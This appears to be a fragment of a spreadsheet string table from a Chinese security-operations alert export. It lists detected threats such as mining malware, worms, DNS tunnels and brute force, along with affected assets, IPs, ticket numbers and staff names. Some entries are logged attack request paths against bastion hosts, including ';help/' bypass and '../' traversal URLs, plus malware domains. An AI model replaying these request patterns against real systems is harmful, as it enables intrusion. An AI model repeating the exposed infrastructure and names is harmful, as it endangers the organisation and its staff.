    <t>60.28.99.74:8443/fort/ip_and_port;help/port_validate</t>
  </si>
  <si>
    <t>113.45.15.50</t>
  </si>
  <si>
    <t>69b67463741d8d2486b90112</t>
  </si>
  <si>
    <t>林俊杰</t>
  </si>
  <si>
    <t>60098</t>
  </si>
  <si>
    <t>69b75976a0e97d17dfae611d</t>
  </si>
  <si>
    <t>69b7b7f1619e35f1f75a1c7e</t>
  </si>
  <si>
    <t>李涛</t>
  </si>
  <si>
    <t>112.225.128.187</t>
  </si>
  <si>
    <t>主机存在感染挖矿家族coinminer</t>
  </si>
  <si>
    <t>69b7b5b5c87d3abad4f8bcaf</t>
  </si>
  <si>
    <t>www.sparkpool.com</t>
  </si>
  <si>
    <t>8eb159ba0000</t>
  </si>
  <si>
    <t>62259</t>
  </si>
  <si>
    <t>69b7b54953b3105a30005709</t>
  </si>
  <si>
    <t>主机存在SQLServer加密快速暴力破解攻击成功等内网横向行为</t>
  </si>
  <si>
    <t>内部威胁&gt;账号爆破</t>
  </si>
  <si>
    <t>未处置</t>
  </si>
  <si>
    <t>69b79f0a49fbf65878537fc2</t>
  </si>
  <si>
    <t>可疑事件、APEX-GPT引擎</t>
  </si>
  <si>
    <t>317820221</t>
  </si>
  <si>
    <t>青岛园区&gt;青岛项目中豪闸机应用服务器</t>
  </si>
  <si>
    <t>59123</t>
  </si>
  <si>
    <t>sql_server</t>
  </si>
  <si>
    <t>69b7b148444e5db4916e0167</t>
  </si>
  <si>
    <t>blj.haiheangroup.com:9443/isomp-protocol/protocol/session</t>
  </si>
  <si>
    <t>121.237.196.65</t>
  </si>
  <si>
    <t>主机存在DNS隧道通信</t>
  </si>
  <si>
    <t>192.168.20.62</t>
  </si>
  <si>
    <t>内部威胁&gt;隐秘隧道</t>
  </si>
  <si>
    <t>69b7b1617bb10ff966cc88af</t>
  </si>
  <si>
    <t>317860001</t>
  </si>
  <si>
    <t>60213</t>
  </si>
  <si>
    <t>主机存在DNS隧道通用引擎DNS通信</t>
  </si>
  <si>
    <t>69b7b161120308c75987fc28</t>
  </si>
  <si>
    <t>119.0.64.72</t>
  </si>
  <si>
    <t>武汉园区&gt;武汉售票PC电脑</t>
  </si>
  <si>
    <t>20676</t>
  </si>
  <si>
    <t>69b7ade5a396910f1b7764a0</t>
  </si>
  <si>
    <t>69b79cc1444e5db4916dfea8</t>
  </si>
  <si>
    <t>69b7a8dd34c7f5b2cf44da97</t>
  </si>
  <si>
    <t>69b7a91ce4fad79a6e554ddd</t>
  </si>
  <si>
    <t>222.92.117.176</t>
  </si>
  <si>
    <t>青岛园区&gt;资产发现系统默认分组</t>
  </si>
  <si>
    <t>69b7a69853b3105a300054f3</t>
  </si>
  <si>
    <t>69b7a1ea53b3105a3000546b</t>
  </si>
  <si>
    <t>69b79295b3f2e004b99c6dd7</t>
  </si>
  <si>
    <t>XDR-STA设备离线</t>
  </si>
  <si>
    <t>69b79c444164fc338412bca4</t>
  </si>
  <si>
    <t>xdr-sta</t>
  </si>
  <si>
    <t>69b7989ee4fad79a6e554bcf</t>
  </si>
  <si>
    <t>221.238.2.150:8443/isomp-protocol/protocol/session</t>
  </si>
  <si>
    <t>119.187.32.191</t>
  </si>
  <si>
    <t>69b796910baeeb9910a78d30</t>
  </si>
  <si>
    <t>主机存在暴力破解威胁</t>
  </si>
  <si>
    <t>69a4de78ee465e849ec6d53c</t>
  </si>
  <si>
    <t>XDR_edr</t>
  </si>
  <si>
    <t>武汉园区&gt;武汉数据库还原测试</t>
  </si>
  <si>
    <t>None</t>
  </si>
  <si>
    <t>69b77587444e5db4916df914</t>
  </si>
  <si>
    <t>69b76dc453b3105a30004cfd</t>
  </si>
  <si>
    <t>69b76c1c741d8d2486b9193a</t>
  </si>
  <si>
    <t>153.34.121.130</t>
  </si>
  <si>
    <t>69b76351e4fad79a6e554369</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/netConfig/add_DNS</t>
  </si>
  <si>
    <t>69b7636844107df81566c6f5</t>
  </si>
  <si>
    <t>192.168.20.29</t>
  </si>
  <si>
    <t>69b76377c87d3abad4f8a6ab</t>
  </si>
  <si>
    <t>lu-da-shi.top</t>
  </si>
  <si>
    <t>50860</t>
  </si>
  <si>
    <t>69b75ee6a396910f1b775973</t>
  </si>
  <si>
    <t>69b75d8853b3105a30004a65</t>
  </si>
  <si>
    <t>0天0时0分6秒</t>
  </si>
  <si>
    <t>69b75b288ccf7e4eb1e47fdf</t>
  </si>
  <si>
    <t>69b756524164fc338412abf2</t>
  </si>
  <si>
    <t>信服小安</t>
  </si>
  <si>
    <t>TSS设备离线</t>
  </si>
  <si>
    <t>69b75651b8cf5597ebb9c817</t>
  </si>
  <si>
    <t>tss</t>
  </si>
  <si>
    <t>天津园区MSS资产</t>
  </si>
  <si>
    <t>69b755388ccf7e4eb1e47ed3</t>
  </si>
  <si>
    <t>69b75448a396910f1b7757b0</t>
  </si>
  <si>
    <t>应急工单&gt;账号爆破</t>
  </si>
  <si>
    <t>69b5fa03c87d3abad4f879b6</t>
  </si>
  <si>
    <t>谢华圣</t>
  </si>
  <si>
    <t>15min</t>
  </si>
  <si>
    <t>E26031503057</t>
  </si>
  <si>
    <t>张有鑫</t>
  </si>
  <si>
    <t>69b71bfa77ca4c920c539135</t>
  </si>
  <si>
    <t>69b710f44164fc3384129895</t>
  </si>
  <si>
    <t>69b70fc74164fc338412980f</t>
  </si>
  <si>
    <t>69b70e6477ca4c920c5389d3</t>
  </si>
  <si>
    <t>69b70328b8cf5597ebb9af02</t>
  </si>
  <si>
    <t>69b6e5f98ccf7e4eb1e47411</t>
  </si>
  <si>
    <t>139.186.176.85:8102/ipmsgroup/router</t>
  </si>
  <si>
    <t>139.186.176.85</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;数据平台-计算存储节点1-emr</t>
  </si>
  <si>
    <t>69b6ca7700c20fc4299c3322</t>
  </si>
  <si>
    <t>202.79.165.168:443</t>
  </si>
  <si>
    <t>202.79.165.168</t>
  </si>
  <si>
    <t>2e418c840000</t>
  </si>
  <si>
    <t>武汉园区&gt;资产发现系统默认分组</t>
  </si>
  <si>
    <t>55072</t>
  </si>
  <si>
    <t>69b6c944c87d3abad4f893e7</t>
  </si>
  <si>
    <t>202.79.165.169:443</t>
  </si>
  <si>
    <t>202.79.165.169</t>
  </si>
  <si>
    <t>51136</t>
  </si>
  <si>
    <t>主机存在JDWP远程命令注入漏洞等内网横向行为</t>
  </si>
  <si>
    <t>应急工单&gt;开源和商业应用漏洞</t>
  </si>
  <si>
    <t>69b6b92e7bb10ff966cc5f82</t>
  </si>
  <si>
    <t>311023403</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;天津出口防火墙</t>
  </si>
  <si>
    <t>45488</t>
  </si>
  <si>
    <t>10050</t>
  </si>
  <si>
    <t>E26031508884</t>
  </si>
  <si>
    <t>任全</t>
  </si>
  <si>
    <t>应急工单&gt;扫描工具</t>
  </si>
  <si>
    <t>69b6b9141e0ebbee2f2f301e</t>
  </si>
  <si>
    <t>192.168.22.54:8881/sdk</t>
  </si>
  <si>
    <t>关键信息变更、APEX-GPT引擎</t>
  </si>
  <si>
    <t>0天0时0分17秒</t>
  </si>
  <si>
    <t>44154</t>
  </si>
  <si>
    <t>8881</t>
  </si>
  <si>
    <t>E26031508883</t>
  </si>
  <si>
    <t>唐永攀</t>
  </si>
  <si>
    <t>69b6b8e5120308c75987d38c</t>
  </si>
  <si>
    <t>E26031508870</t>
  </si>
  <si>
    <t>69b5a57a120308c75987b438</t>
  </si>
  <si>
    <t>39354</t>
  </si>
  <si>
    <t>rdp</t>
  </si>
  <si>
    <t>E26031501320</t>
  </si>
  <si>
    <t>聂江海</t>
  </si>
  <si>
    <t>69b5289f10edc44512abd60b</t>
  </si>
  <si>
    <t>姜洪阳</t>
  </si>
  <si>
    <t>69b6726cb3f2e004b99c502a</t>
  </si>
  <si>
    <t>主机存在感染蠕虫家族xred</t>
  </si>
  <si>
    <t>192.168.4.170</t>
  </si>
  <si>
    <t>内部威胁&gt;蠕虫</t>
  </si>
  <si>
    <t>69b6148e642bc50721855da3</t>
  </si>
  <si>
    <t>xred.mooo.com</t>
  </si>
  <si>
    <t>8ebcc6050000</t>
  </si>
  <si>
    <t>64176</t>
  </si>
  <si>
    <t>69b52187741d8d2486b8e298</t>
  </si>
  <si>
    <t>1451</t>
  </si>
  <si>
    <t>69b66f5b9368d173c0d3dc62</t>
  </si>
  <si>
    <t>69b65ff6f918f92f09e193ee</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/system;help/concentration_management/install_patch</t>
  </si>
  <si>
    <t>175.152.108.251</t>
  </si>
  <si>
    <t>69b659ae0baeeb9910a76dfd</t>
  </si>
  <si>
    <t>223.104.122.170</t>
  </si>
  <si>
    <t>69b637d9642bc5072185625a</t>
  </si>
  <si>
    <t>steamhost.cc</t>
  </si>
  <si>
    <t>39052</t>
  </si>
  <si>
    <t>69b4ea02a396910f1b7722c2</t>
  </si>
  <si>
    <t>69b500c4741d8d2486b8df9a</t>
  </si>
  <si>
    <t>qdjdhy.myhudong.com/ym/ActiveSetting/edit</t>
  </si>
  <si>
    <t>47.98.227.238</t>
  </si>
  <si>
    <t>69ae63dd02504307e6bb3547</t>
  </si>
  <si>
    <t>57682</t>
  </si>
  <si>
    <t>主机存在SSH快速暴力破解等内网横向行为</t>
  </si>
  <si>
    <t>已加白</t>
  </si>
  <si>
    <t>69b5b318c87d3abad4f873ed</t>
  </si>
  <si>
    <t>317820323</t>
  </si>
  <si>
    <t>上海园区MSS资产&gt;资产发现系统默认分组</t>
  </si>
  <si>
    <t>XDR</t>
  </si>
  <si>
    <t>59646</t>
  </si>
  <si>
    <t>ssh</t>
  </si>
  <si>
    <t>69b60ea07497cd0e21ae4531</t>
  </si>
  <si>
    <t>69b60706a0e97d17dfae42fd</t>
  </si>
  <si>
    <t>69b5ca7b77ca4c920c534f1e</t>
  </si>
  <si>
    <t>69b5bf754164fc3384124b8d</t>
  </si>
  <si>
    <t>69b5be474164fc3384124b01</t>
  </si>
  <si>
    <t>69b5bce477ca4c920c5347fd</t>
  </si>
  <si>
    <t>69b5b1a9b8cf5597ebb968bb</t>
  </si>
  <si>
    <t>主机存在VNC扫描，同时发现横向移动行为</t>
  </si>
  <si>
    <t>应急工单&gt;特定端口扫描</t>
  </si>
  <si>
    <t>69b58d3700c20fc4299c0ed4</t>
  </si>
  <si>
    <t>317820175</t>
  </si>
  <si>
    <t>0天0时0分34秒</t>
  </si>
  <si>
    <t>38456</t>
  </si>
  <si>
    <t>5900</t>
  </si>
  <si>
    <t>E26031500492</t>
  </si>
  <si>
    <t>李聪</t>
  </si>
  <si>
    <t>主机存在RDP远程桌面服务扫描</t>
  </si>
  <si>
    <t>内部威胁&gt;特定端口扫描</t>
  </si>
  <si>
    <t>69b58cf87bb10ff966cc3cef</t>
  </si>
  <si>
    <t>172.16.5.93</t>
  </si>
  <si>
    <t>317820285</t>
  </si>
  <si>
    <t>尝试</t>
  </si>
  <si>
    <t>35222</t>
  </si>
  <si>
    <t>69b54a8da0e97d17dfae3462</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/netConfig/change_net</t>
  </si>
  <si>
    <t>115.209.68.63</t>
  </si>
  <si>
    <t>69b529dea0e97d17dfae322e</t>
  </si>
  <si>
    <t>192.168.2.198</t>
  </si>
  <si>
    <t>69b52b9c00c20fc4299c0402</t>
  </si>
  <si>
    <t>103.183.2.154:5200</t>
  </si>
  <si>
    <t>103.183.2.154</t>
  </si>
  <si>
    <t>青岛园区</t>
  </si>
  <si>
    <t>64808</t>
  </si>
  <si>
    <t>5200</t>
  </si>
  <si>
    <t>69b3cd66741d8d2486b8c13c</t>
  </si>
  <si>
    <t>19681</t>
  </si>
  <si>
    <t>69b5139e53b3105a30001a21</t>
  </si>
  <si>
    <t>69b50a1ba0e97d17dfae2f75</t>
  </si>
  <si>
    <t>69b4fc1a44107df81566904b</t>
  </si>
  <si>
    <t>69b4e45704b05750ff882709</t>
  </si>
  <si>
    <t>69b4e45177ca4c920c531b49</t>
  </si>
  <si>
    <t>69b4b71c4cef246aae941ff8</t>
  </si>
  <si>
    <t>69b4ad1c34c7f5b2cf449078</t>
  </si>
  <si>
    <t>69b478fa77ca4c920c5308a2</t>
  </si>
  <si>
    <t>69b46df44164fc338411fbe0</t>
  </si>
  <si>
    <t>69b46cc74164fc338411fb57</t>
  </si>
  <si>
    <t>69b46b6577ca4c920c52ffd6</t>
  </si>
  <si>
    <t>69b46029b8cf5597ebb91d2a</t>
  </si>
  <si>
    <t>主机存在Nmap扫描工具攻击</t>
  </si>
  <si>
    <t>外部威胁&gt;扫描工具</t>
  </si>
  <si>
    <t>69b435f64536f778e913b750</t>
  </si>
  <si>
    <t>220.249.115.2:19080/evox/about</t>
  </si>
  <si>
    <t>121.41.165.206</t>
  </si>
  <si>
    <t>317970007</t>
  </si>
  <si>
    <t>武汉园区&gt;应用服务器主</t>
  </si>
  <si>
    <t>55398</t>
  </si>
  <si>
    <t>69b4136d7497cd0e21ae19cf</t>
  </si>
  <si>
    <t>171.214.214.191</t>
  </si>
  <si>
    <t>69b3d89153b3105a30fffe25</t>
  </si>
  <si>
    <t>屈俊杰</t>
  </si>
  <si>
    <t>69b27a9d741d8d2486b89c29</t>
  </si>
  <si>
    <t>63013</t>
  </si>
  <si>
    <t>69b391b210edc44512abad96</t>
  </si>
  <si>
    <t>梁泽鸿</t>
  </si>
  <si>
    <t>69b3c3cdb3f2e004b99c1038</t>
  </si>
  <si>
    <t>69b3bdbb53b3105a30fffa89</t>
  </si>
  <si>
    <t>69b3bcf4910349744ff2946e</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/cssp;help/v1/app/upload_file</t>
  </si>
  <si>
    <t>223.160.165.58</t>
  </si>
  <si>
    <t>69b3ba4b7497cd0e21ae1062</t>
  </si>
  <si>
    <t>69b3744d910349744ff28a41</t>
  </si>
  <si>
    <t>69b3a5b8619e35f1f759b854</t>
  </si>
  <si>
    <t>69b3a48353b3105a30fff71b</t>
  </si>
  <si>
    <t>主机存在RDP端口转发</t>
  </si>
  <si>
    <t>内部威胁&gt;端口转发</t>
  </si>
  <si>
    <t>69ae26faee465e849ec81d1b</t>
  </si>
  <si>
    <t>317881001</t>
  </si>
  <si>
    <t>成都园区&gt;成都堡垒机</t>
  </si>
  <si>
    <t>63018</t>
  </si>
  <si>
    <t>69b26d4334c7f5b2cf445854</t>
  </si>
  <si>
    <t>69b3a08be84b59c4fcc7f9ae</t>
  </si>
  <si>
    <t>cdnviphei.cloud.xdpddos.com</t>
  </si>
  <si>
    <t>202.103.24.68</t>
  </si>
  <si>
    <t>8eadb6650000</t>
  </si>
  <si>
    <t>51480</t>
  </si>
  <si>
    <t>69b38f3644107df815666b03</t>
  </si>
  <si>
    <t>192.168.17.136</t>
  </si>
  <si>
    <t>69b38f38a396910f1b76ff93</t>
  </si>
  <si>
    <t>69b38c8710edc44512abacfa</t>
  </si>
  <si>
    <t>69b38c8344107df815666aaf</t>
  </si>
  <si>
    <t>69b387e30baeeb9910a72cfd</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/subforeign;help/audit/remote_get_clip_img</t>
  </si>
  <si>
    <t>116.237.183.114</t>
  </si>
  <si>
    <t>69b37fee44107df815666900</t>
  </si>
  <si>
    <t>125.36.66.193</t>
  </si>
  <si>
    <t>69b37d477497cd0e21ae0825</t>
  </si>
  <si>
    <t>112.20.243.193</t>
  </si>
  <si>
    <t>69b378ba4cef246aae93ff08</t>
  </si>
  <si>
    <t>69b3685534c7f5b2cf446f3c</t>
  </si>
  <si>
    <t>69b36244a0e97d17dfae0315</t>
  </si>
  <si>
    <t>69b21874b3f2e004b99bdf98</t>
  </si>
  <si>
    <t>69b36304910349744ff2877f</t>
  </si>
  <si>
    <t>69b21c140baeeb9910a705af</t>
  </si>
  <si>
    <t>69b3277a77ca4c920c52bfb9</t>
  </si>
  <si>
    <t>MSSP最近12小时未检测到AF设备安全日志上报</t>
  </si>
  <si>
    <t>策略调优&gt;日志检测异常</t>
  </si>
  <si>
    <t>生成事件（自动）</t>
  </si>
  <si>
    <t>69b32112ae98fd3db76d24b2</t>
  </si>
  <si>
    <t>日志上报异常</t>
  </si>
  <si>
    <t>E26031303197</t>
  </si>
  <si>
    <t>0天0时0分25秒</t>
  </si>
  <si>
    <t>6641b087714a825cdaf692ee</t>
  </si>
  <si>
    <t>69a7b447e1dd7768c46ccdc1</t>
  </si>
  <si>
    <t>E26030408945</t>
  </si>
  <si>
    <t>0天0时0分37秒</t>
  </si>
  <si>
    <t>693b934558913c38c37f9491</t>
  </si>
  <si>
    <t>E25121211307</t>
  </si>
  <si>
    <t>0天0时0分21秒</t>
  </si>
  <si>
    <t>6980211e0cdae0ebc012958d</t>
  </si>
  <si>
    <t>E26020209640</t>
  </si>
  <si>
    <t>0天0时1分15秒</t>
  </si>
  <si>
    <t>69857862e1dd7768c46c0ddb</t>
  </si>
  <si>
    <t>E26020615334</t>
  </si>
  <si>
    <t>0天0时0分56秒</t>
  </si>
  <si>
    <t>69b31c754164fc338411bd8d</t>
  </si>
  <si>
    <t>69b31b484164fc338411bd08</t>
  </si>
  <si>
    <t>69b319e477ca4c920c52b887</t>
  </si>
  <si>
    <t>69b30ea8b8cf5597ebb8cf75</t>
  </si>
  <si>
    <t>69b2f1728ccf7e4eb1e41560</t>
  </si>
  <si>
    <t>69b2b91244107df8156655f0</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/subforeign;help/audit/remote_get_clip_img</t>
  </si>
  <si>
    <t>69b2a5d67497cd0e21adf3f1</t>
  </si>
  <si>
    <t>69b2190f741d8d2486b88dcb</t>
  </si>
  <si>
    <t>69b27b66a396910f1b76e444</t>
  </si>
  <si>
    <t>69b12887741d8d2486b873d7</t>
  </si>
  <si>
    <t>52157</t>
  </si>
  <si>
    <t>69b22ee610edc44512ab88b2</t>
  </si>
  <si>
    <t>69b2676a4cef246aae93e44f</t>
  </si>
  <si>
    <t>69b26573910349744ff27040</t>
  </si>
  <si>
    <t>69b26506a0e97d17dfadebaf</t>
  </si>
  <si>
    <t>117.10.138.31</t>
  </si>
  <si>
    <t>69b25bde741d8d2486b897f1</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/workflow/nodeSet/doSaveOperatorGroupInfo</t>
  </si>
  <si>
    <t>116.237.70.193</t>
  </si>
  <si>
    <t>69b2526745595bae97affcf2</t>
  </si>
  <si>
    <t>192.168.1.30</t>
  </si>
  <si>
    <t>69b25114a396910f1b76de76</t>
  </si>
  <si>
    <t>69b250f3619e35f1f75994f8</t>
  </si>
  <si>
    <t>69b2497553b3105a30ffd409</t>
  </si>
  <si>
    <t>69b23fcc2fb5a96697b6f011</t>
  </si>
  <si>
    <t>111.181.29.50</t>
  </si>
  <si>
    <t>69b2318153b3105a30ffd0dc</t>
  </si>
  <si>
    <t>69b22e2e444e5db4916d7852</t>
  </si>
  <si>
    <t>tdyy.haiheangroup.com:9443/isomp-protocol/protocol/getHis</t>
  </si>
  <si>
    <t>111.121.72.202</t>
  </si>
  <si>
    <t>69b22d5910edc44512ab8868</t>
  </si>
  <si>
    <t>69b22500910349744ff26701</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/csspost/../user/getLdap</t>
  </si>
  <si>
    <t>103.163.180.95</t>
  </si>
  <si>
    <t>69b223ca53b3105a30ffce86</t>
  </si>
  <si>
    <t>69b0d2ca10edc44512ab6193</t>
  </si>
  <si>
    <t>69b21db9741d8d2486b88e8d</t>
  </si>
  <si>
    <t>69b2103310edc44512ab83b3</t>
  </si>
  <si>
    <t>192.168.17.72</t>
  </si>
  <si>
    <t>69b21c949368d173c0d37027</t>
  </si>
  <si>
    <t>69b21c4a910349744ff265a5</t>
  </si>
  <si>
    <t>69b215360baeeb9910a704c5</t>
  </si>
  <si>
    <t>69b21383a396910f1b76d573</t>
  </si>
  <si>
    <t>69b21192f918f92f09e12aaa</t>
  </si>
  <si>
    <t>69b20fec8ccf7e4eb1e3fc04</t>
  </si>
  <si>
    <t>69b1d5fa77ca4c920c5277bd</t>
  </si>
  <si>
    <t>69b1caf64164fc33841172d8</t>
  </si>
  <si>
    <t>69b1c9c74164fc3384117265</t>
  </si>
  <si>
    <t>69b1c86477ca4c920c527079</t>
  </si>
  <si>
    <t>69b1ba130baeeb9910a6fae7</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/user;help/getLdap</t>
  </si>
  <si>
    <t>182.90.229.95</t>
  </si>
  <si>
    <t>69b1bd28b8cf5597ebb87e09</t>
  </si>
  <si>
    <t>69b1b64c4164fc3384116a3c</t>
  </si>
  <si>
    <t>69b187357497cd0e21add1e4</t>
  </si>
  <si>
    <t>69b136c644107df815662a8d</t>
  </si>
  <si>
    <t>姚智彬</t>
  </si>
  <si>
    <t>69b1282044107df8156628bc</t>
  </si>
  <si>
    <t>69b115df2fb5a96697b6cf51</t>
  </si>
  <si>
    <t>69b12af50baeeb9910a6edab</t>
  </si>
  <si>
    <t>69b12afb10edc44512ab6d76</t>
  </si>
  <si>
    <t>69afd6f3741d8d2486b84d59</t>
  </si>
  <si>
    <t>59638</t>
  </si>
  <si>
    <t>69b119e544107df8156626b3</t>
  </si>
  <si>
    <t>69b11a068ccf7e4eb1e3e239</t>
  </si>
  <si>
    <t>69b1167ea396910f1b76bba2</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/user;help/getLdap</t>
  </si>
  <si>
    <t>220.205.248.99</t>
  </si>
  <si>
    <t>69b1125ee4fad79a6e54a2f6</t>
  </si>
  <si>
    <t>1.49.113.169</t>
  </si>
  <si>
    <t>69b110044cef246aae93bd5e</t>
  </si>
  <si>
    <t>69b108274cef246aae93bc2c</t>
  </si>
  <si>
    <t>218.22.61.58</t>
  </si>
  <si>
    <t>主机遭受漏洞利用攻击</t>
  </si>
  <si>
    <t>外部威胁&gt;漏洞利用攻击</t>
  </si>
  <si>
    <t>69b10dd02fb5a96697b6ce48</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/doc/upload/uploadFile2Doc?category=,,333&amp;workflowid=2184&amp;listType=list&amp;authStr=undefined&amp;authSignatureStr=undefined&amp;f_weaver_belongto_userid=4488&amp;f_weaver_belongto_usertype=0&amp;wfTestStr=</t>
  </si>
  <si>
    <t>T20240118192827297</t>
  </si>
  <si>
    <t>69b105bd10edc44512ab6853</t>
  </si>
  <si>
    <t>144.12.90.126</t>
  </si>
  <si>
    <t>69b0ff5c8ccf7e4eb1e3de87</t>
  </si>
  <si>
    <t>oa.haiheangroup.com:8788/api/integration/workflowflow/getInterfaceRegisterDMLOperation</t>
  </si>
  <si>
    <t>69b0f9f253b3105a30ffaf00</t>
  </si>
  <si>
    <t>69b0f59653b3105a30ffae90</t>
  </si>
  <si>
    <t>69b0e53c53b3105a30ffaca6</t>
  </si>
  <si>
    <t>69b0d6cd53b3105a30ffaa93</t>
  </si>
  <si>
    <t>69b0d8b153b3105a30ffaadc</t>
  </si>
  <si>
    <t>69b0d6a9219c4e580a9ee40f</t>
  </si>
  <si>
    <t>202.99.96.68</t>
  </si>
  <si>
    <t>天津园区MSS资产&gt;备数据库-2-1</t>
  </si>
  <si>
    <t>33802</t>
  </si>
  <si>
    <t>69b0d50ca396910f1b76b2ab</t>
  </si>
  <si>
    <t>221.238.2.150:8443/fort/system;help/concentration_management/del_patch</t>
  </si>
  <si>
    <t>39.144.78.158</t>
  </si>
  <si>
    <t>69b0d0eb04b05750ff874431</t>
  </si>
  <si>
    <t>主机存在远程管理工具向日葵流量检测</t>
  </si>
  <si>
    <t>内部威胁&gt;远控行为</t>
  </si>
  <si>
    <t>69b0d0fcac6ecec380006d2c</t>
  </si>
  <si>
    <t>60.163.191.22</t>
  </si>
  <si>
    <t>317216024</t>
  </si>
  <si>
    <t>15130</t>
  </si>
  <si>
    <t>4118</t>
  </si>
  <si>
    <t>69b0cdc1741d8d2486b86741</t>
  </si>
  <si>
    <t>69b0c6c98ccf7e4eb1e3d6b6</t>
  </si>
  <si>
    <t>0天0时0分14秒</t>
  </si>
  <si>
    <t>69b0cc718ccf7e4eb1e3d78d</t>
  </si>
  <si>
    <t>69afab110baeeb9910a6c30f</t>
  </si>
  <si>
    <t>69b0c2cf619e35f1f75965e2</t>
  </si>
  <si>
    <t>69b0c00f741d8d2486b86514</t>
  </si>
  <si>
    <t>69b0be9ca0e97d17dfadba5b</t>
  </si>
  <si>
    <t>69b0bdba910349744ff23d93</t>
  </si>
  <si>
    <t>69af6eed0baeeb9910a6ba02</t>
  </si>
  <si>
    <t>69b0b3cf7aef01651bedfb5f</t>
  </si>
  <si>
    <t>1801</t>
  </si>
  <si>
    <t>69b0847a77ca4c920c523290</t>
  </si>
  <si>
    <t>69b079754164fc3384113363</t>
  </si>
  <si>
    <t>69b078484164fc33841132fc</t>
  </si>
  <si>
    <t>69b076e477ca4c920c522ba0</t>
  </si>
  <si>
    <t>69b06baab8cf5597ebb82bb8</t>
  </si>
  <si>
    <t>699d76ddac6ecec380fdcbeb</t>
  </si>
  <si>
    <t>APEX-GPT引擎、可疑事件</t>
  </si>
  <si>
    <t>武汉园区&gt;武汉极乐汤帝派鞋柜服务器</t>
  </si>
  <si>
    <t>账号暴破</t>
  </si>
  <si>
    <t>外部威胁&gt;暴力破解</t>
  </si>
  <si>
    <t>69b0159310edc44512ab4e97</t>
  </si>
  <si>
    <t>223.104.194.90</t>
  </si>
  <si>
    <t>T202406251021324</t>
  </si>
  <si>
    <t>E26031020216</t>
  </si>
  <si>
    <t>技术误报</t>
  </si>
  <si>
    <t>69aff46da0e97d17dfada785</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/resource;help/find_resource</t>
  </si>
  <si>
    <t>39.100.75.158</t>
  </si>
  <si>
    <t>69aff19334c7f5b2cf441343</t>
  </si>
  <si>
    <t>180.98.162.58</t>
  </si>
  <si>
    <t>69afec5d444e5db4916d3c4f</t>
  </si>
  <si>
    <t>119.4.87.216</t>
  </si>
  <si>
    <t>主机存在感染木马远控家族agent</t>
  </si>
  <si>
    <t>69afa5dee0683e0f8ca924ed</t>
  </si>
  <si>
    <t>8.148.24.19:4443</t>
  </si>
  <si>
    <t>8.148.24.19</t>
  </si>
  <si>
    <t>6574882d0000</t>
  </si>
  <si>
    <t>55042</t>
  </si>
  <si>
    <t>4443</t>
  </si>
  <si>
    <t>69afe5bc7497cd0e21ada662</t>
  </si>
  <si>
    <t>69afe57944107df8156605da</t>
  </si>
  <si>
    <t>69afe4417497cd0e21ada635</t>
  </si>
  <si>
    <t>69afe3aae0683e0f8ca93194</t>
  </si>
  <si>
    <t>34772</t>
  </si>
  <si>
    <t>69afdcb953b3105a30ff91ec</t>
  </si>
  <si>
    <t>69afdbc97497cd0e21ada524</t>
  </si>
  <si>
    <t>69af8b2134c7f5b2cf44060f</t>
  </si>
  <si>
    <t>69afd7287aef01651beddfa9</t>
  </si>
  <si>
    <t>45796</t>
  </si>
  <si>
    <t>69af86d145595bae97afaf1b</t>
  </si>
  <si>
    <t>69afd18644107df815660361</t>
  </si>
  <si>
    <t>69ae8376741d8d2486b82670</t>
  </si>
  <si>
    <t>1847</t>
  </si>
  <si>
    <t>69afcdd8f918f92f09e0ed6d</t>
  </si>
  <si>
    <t>223.104.202.249</t>
  </si>
  <si>
    <t>69afc403a0e97d17dfada1ba</t>
  </si>
  <si>
    <t>69afbb4d910349744ff22373</t>
  </si>
  <si>
    <t>221.226.219.50</t>
  </si>
  <si>
    <t>69afb7c853b3105a30ff8d1d</t>
  </si>
  <si>
    <t>69afb90e44107df815660051</t>
  </si>
  <si>
    <t>222.92.117.175:9443/fort/system;help/concentration_management/del_patch</t>
  </si>
  <si>
    <t>69ae66c010edc44512ab20a0</t>
  </si>
  <si>
    <t>69afb30144107df81565ff77</t>
  </si>
  <si>
    <t>0天0时0分12秒</t>
  </si>
  <si>
    <t>69afa249e0683e0f8ca9244d</t>
  </si>
  <si>
    <t>56497</t>
  </si>
  <si>
    <t>69afa0a77aef01651bedd483</t>
  </si>
  <si>
    <t>52584</t>
  </si>
  <si>
    <t>69af9820600970edcdf6948c</t>
  </si>
  <si>
    <t>60.163.191.14</t>
  </si>
  <si>
    <t>16022</t>
  </si>
  <si>
    <t>69af8f1144107df81565faac</t>
  </si>
  <si>
    <t>主机存在感染普通病毒</t>
  </si>
  <si>
    <t>内部威胁&gt;普通病毒</t>
  </si>
  <si>
    <t>69af4029ee465e849ec84815</t>
  </si>
  <si>
    <t>8.148.64.76:4443</t>
  </si>
  <si>
    <t>8.148.64.76</t>
  </si>
  <si>
    <t>748192d20000</t>
  </si>
  <si>
    <t>51524</t>
  </si>
  <si>
    <t>192.168.1.32</t>
  </si>
  <si>
    <t>69af8829444e5db4916d2fc5</t>
  </si>
  <si>
    <t>mbgxls.pinshi-group.com/api/b_agent_user/loginByPassword</t>
  </si>
  <si>
    <t>47.98.189.174</t>
  </si>
  <si>
    <t>69af8447741d8d2486b841e0</t>
  </si>
  <si>
    <t>60.28.99.74:8443/fort/user;help/getLdap</t>
  </si>
  <si>
    <t>220.180.33.97</t>
  </si>
  <si>
    <t>69af81207497cd0e21ad98fe</t>
  </si>
  <si>
    <t>112.224.194.206</t>
  </si>
  <si>
    <t>69af80e545595bae97afae0b</t>
  </si>
  <si>
    <t>69ae77fcf918f92f09e0c985</t>
  </si>
  <si>
    <t>69af70b8f918f92f09e0e08e</t>
  </si>
  <si>
    <t>69ae37f34cef246aae936c00</t>
  </si>
  <si>
    <t>69a63599253558aa57e6f859</t>
  </si>
  <si>
    <t>49280</t>
  </si>
  <si>
